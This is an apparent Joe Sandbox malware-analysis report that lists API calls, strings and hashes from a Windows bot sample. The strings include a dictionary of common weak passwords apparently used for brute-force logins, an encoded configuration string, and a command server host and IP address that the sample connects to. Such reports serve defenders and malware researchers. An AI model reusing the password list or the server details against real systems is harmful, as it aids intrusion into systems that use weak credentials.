                                • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                • GetProcAddress.KERNEL32(00000000), ref: 0040536E
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                • GetProcAddress.KERNEL32(00000000), ref: 0040537C
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                • GetProcAddress.KERNEL32(00000000), ref: 0040538E
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                • GetProcAddress.KERNEL32(00000000), ref: 004053A0
                                • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,000F003F,?), ref: 00405464
                                • memset.MSVCRT ref: 00405483
                                • RegQueryValueExA.KERNELBASE(?,00000049,00000000,00000000,?,?), ref: 004054C6
                                • RegCloseKey.KERNELBASE(?), ref: 004054D5
                                • GetFileAttributesA.KERNELBASE(?), ref: 004054DF
                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054FD
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 0040551C
                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00405533
                                • GlobalFree.KERNEL32(?), ref: 00405540
                                • CloseHandle.KERNEL32(00000000), ref: 00405547
                                • CloseHandle.KERNELBASE(00000000), ref: 00405552
                                • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                • GlobalFree.KERNEL32(?), ref: 004055AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFileLibraryLoadProcResourceUpdate$CloseGlobal$FreeHandle$AllocAttributesBeginCreateOpenQueryReadSizeValuelstrlenmemset
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 2023098254-1497069993
                                • Opcode ID: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                • Opcode Fuzzy Hash: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79

                                Control-flow Graph

                                • Control-flow graph (rendered image, not reproduced): function entry block at 00402DD5; legend: Executed / Not Executed
                                APIs
                                  • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                • gethostbyname.WS2_32(?), ref: 00402FCF
                                • memset.MSVCRT ref: 00402FFA
                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                • memset.MSVCRT ref: 00403049
                                • sprintf.MSVCRT ref: 0040306F
                                • Sleep.KERNELBASE(000000C8), ref: 00403098
                                • WSACleanup.WS2_32 ref: 004030ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
                                • String ID: %d.%d.%d.%d$111$123$123$123456$12345678$1314520$5201314$88888$NULL$abc123$admin$administrator$alex$alex$angel$asdf$asdfgh$baby$bbbbbb$caonima$enter$game$guest$hack$home$home$love$love$memory$money$movie$movie$password$qwerty$root$root$test$test$time$user$woaini$xpuser$yeah
                                • API String ID: 2657193355-195746125
                                • Opcode ID: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                • Opcode Fuzzy Hash: 05354827fa881561b6b3f17ce7718c656727c28b50fa67908cbf439bfa371650
                                • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58

                                Control-flow Graph

                                control_flow_graph 412 4059f4-405afe LoadLibraryA GetProcAddress _mbscpy _mbscat RegOpenKeyExA 413 405b00-405b08 412->413 414 405b0a 412->414 415 405b0c-405b0f 413->415 414->415
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                • GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                • _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                • _mbscat.MSVCRT ref: 00405AD7
                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadOpenProc_mbscat_mbscpy
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$M$RegCloseKey$S$S$S$S$SYSTEM\CurrentControlSet\Services\$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 1994725845-1712674794
                                • Opcode ID: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                • Instruction ID: 35d77256bc8034983bafe4ceb320269e5385723e05cff16902321712d41d725d
                                • Opcode Fuzzy Hash: fe1cd4cbf34c5d281c3dbb1e64282f5bf3c4517e78142a43a9fbfdfd1bffe10b
                                • Instruction Fuzzy Hash: EA410F11D0C2C9E9EB12D2A8C9097DEBFB54B16749F0840D9D2847A2D2C2FE575887B6

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
                                • GetProcAddress.KERNEL32(00000000), ref: 00403392
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                • GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                • strstr.MSVCRT ref: 004033E0
                                • memset.MSVCRT ref: 004033F9
                                • strcspn.MSVCRT ref: 00403410
                                • strncpy.MSVCRT ref: 0040341B
                                • strcspn.MSVCRT ref: 0040342D
                                • atoi.MSVCRT(?), ref: 00403437
                                • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                • String ID: 120.48.34.233$EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                • API String ID: 2255542143-3763905265
                                • Opcode ID: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                • Opcode Fuzzy Hash: d1af9a050918730770f70f886657c6e6b1d211d4c2088a602517dbf745d6cec9
                                • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8

                                Control-flow Graph

                                control_flow_graph 429 406a48-406abd __set_app_type __p__fmode __p__commode call 406bc7 432 406acb-406b22 call 406bb2 _initterm __getmainargs _initterm 429->432 433 406abf-406aca __setusermatherr 429->433 436 406b24-406b2c 432->436 437 406b5e-406b61 432->437 433->432 440 406b32-406b35 436->440 441 406b2e-406b30 436->441 438 406b63-406b67 437->438 439 406b3b-406b3f 437->439 438->437 442 406b41-406b43 439->442 443 406b45-406b56 GetStartupInfoA 439->443 440->439 444 406b37-406b38 440->444 441->436 441->440 442->443 442->444 445 406b58-406b5c 443->445 446 406b69-406b6b 443->446 444->439 447 406b6c-406b77 GetModuleHandleA call 40597d 445->447 446->447 449 406b7c-406b99 exit _XcptFilter 447->449
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                • String ID:
                                • API String ID: 801014965-0
                                • Opcode ID: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction ID: ce64524e5db3081824dfc069b3bde325727510d573eb5451e936e5ebab442623
                                • Opcode Fuzzy Hash: 8843e61d07e986c3672b824004c4519e78d1453bad07b663c43a0e9dfb3d122a
                                • Instruction Fuzzy Hash: 0F417EB1900364AFCB249FA5DD85AAA7BB8EB09710B20013FF592B72E1D7785940CB18

                                Control-flow Graph

                                control_flow_graph 461 406c10-406c38 LoadLibraryA GetProcAddress inet_addr 462 406c3a-406c3f gethostbyname 461->462 463 406c4b-406c4d 461->463 464 406c41-406c43 462->464 465 406c44-406c49 462->465 465->463
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                • GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                • inet_addr.WS2_32(?), ref: 00406C30
                                • gethostbyname.WS2_32(?), ref: 00406C3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcgethostbynameinet_addr
                                • String ID: WS2_32.dll$gethostbyname
                                • API String ID: 688652319-1612545655
                                • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 004050DB
                                • CreateThread.KERNELBASE(00000000,00000000,0040407C,00000000,00000000,00000000), ref: 004050ED
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                • CloseHandle.KERNEL32 ref: 00405107
                                • closesocket.WS2_32 ref: 00405113
                                • Sleep.KERNELBASE(0000012C), ref: 0040511E
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 00405137
                                • CreateThread.KERNELBASE(00000000,00000000,004048AA,00000000,00000000,00000000), ref: 00405149
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                • CloseHandle.KERNEL32 ref: 00405163
                                • closesocket.WS2_32 ref: 0040516F
                                • Sleep.KERNELBASE(0000012C), ref: 0040517A
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                APIs
                                • htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,76F8F550,76F90BD0,00404875,chinagov.8800.org), ref: 00406C1C
                                  • Part of subcall function 00406C10: GetProcAddress.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                  • Part of subcall function 00406C10: gethostbyname.WS2_32(?), ref: 00406C3B
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                • closesocket.WS2_32(00000000), ref: 0040489A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProcclosesocketconnectgethostbynamehtonsinet_addrsocket
                                • String ID: chinagov.8800.org
                                • API String ID: 1138879652-2288617695
                                • Opcode ID: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                • Opcode Fuzzy Hash: ab95bdf708f1f7cba5c66944165f83f70453277af22b67548b5d61e04670a3d0
                                • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                • Sleep.KERNELBASE(00000064), ref: 00405207
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                  • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 0040521C
                                • Sleep.KERNELBASE(00000064), ref: 0040522D
                                • CreateThread.KERNELBASE(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                • String ID:
                                • API String ID: 3108282239-0
                                • Opcode ID: bcd9068842d19d9c9cbd494ec3ef7a5d8030ed6fbbbb000646c41e8093572c94
                                • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                • Opcode Fuzzy Hash: bcd9068842d19d9c9cbd494ec3ef7a5d8030ed6fbbbb000646c41e8093572c94
                                • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                • Sleep.KERNELBASE(00000064), ref: 004051A6
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                  • Part of subcall function 0040507D: _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 004051BB
                                • Sleep.KERNELBASE(00000064), ref: 004051CC
                                • CreateThread.KERNELBASE(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThread_localtime32atoitimewsprintf
                                • String ID:
                                • API String ID: 3108282239-0
                                • Opcode ID: ac8278cae3d0e4772c890e3eb4b9be722006d9c6b36b5f1e017aca795c40357a
                                • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                • Opcode Fuzzy Hash: ac8278cae3d0e4772c890e3eb4b9be722006d9c6b36b5f1e017aca795c40357a
                                • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403706
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0040371F
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 00403738
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                • Instruction ID: 29f9e6de88a75dcdd7812cd5ab187c77c919a30331352215288d74a330fee493
                                • Opcode Fuzzy Hash: 027ff2441b7a9df93180c891504bafdcf51998b41a4abf2c8db8189f6d2e3e47
                                • Instruction Fuzzy Hash: 1111C4F1600214ABDB309E68CDC4BDA7E9C9B04795F004635BA59FB2D0D3B5EE808A58
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040382A
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00403843
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 0040385C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                • Instruction ID: 0644feca00c3923390fafb838483ae5f7d21c05a749549fcef03ec3df5c1d209
                                • Opcode Fuzzy Hash: 36543b925f275196894919caea4c5fa10a05e6b03b8851fbac056ab2d5a050a6
                                • Instruction Fuzzy Hash: 5E11D6B26002146BDB20AF69CDC9FDB3EECAB04391F004675BA19F61D0D3B4CE8087A4
                                APIs
                                • time.MSVCRT(00000000,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405087
                                • _localtime32.MSVCRT(?,?,76F90F00,?,?,?,?,?,?,?,004051B4,?), ref: 00405094
                                • wsprintfA.USER32 ref: 004050BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: _localtime32timewsprintf
                                • String ID: %04d%02d%02d
                                • API String ID: 1589165986-2607228566
                                • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadwsprintf
                                • String ID: hra%u.dll
                                • API String ID: 2341783205-640331709
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                • connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                • closesocket.WS2_32(00000000), ref: 0040406A
                                Similarity
                                • API ID: closesocketconnectsocket
                                • String ID:
                                • API String ID: 643388700-0
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                Similarity
                                • API ID: Ioctlsetsockopt
                                • String ID:
                                • API String ID: 1903391676-0
                                APIs
                                • GetModuleFileNameA.KERNELBASE(00000000,00000000,00000104,00000001), ref: 00402AC1
                                Similarity
                                • API ID: FileModuleName
                                • String ID:
                                • API String ID: 514040917-0
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 0040310B
                                Similarity
                                • API ID: CreateThread
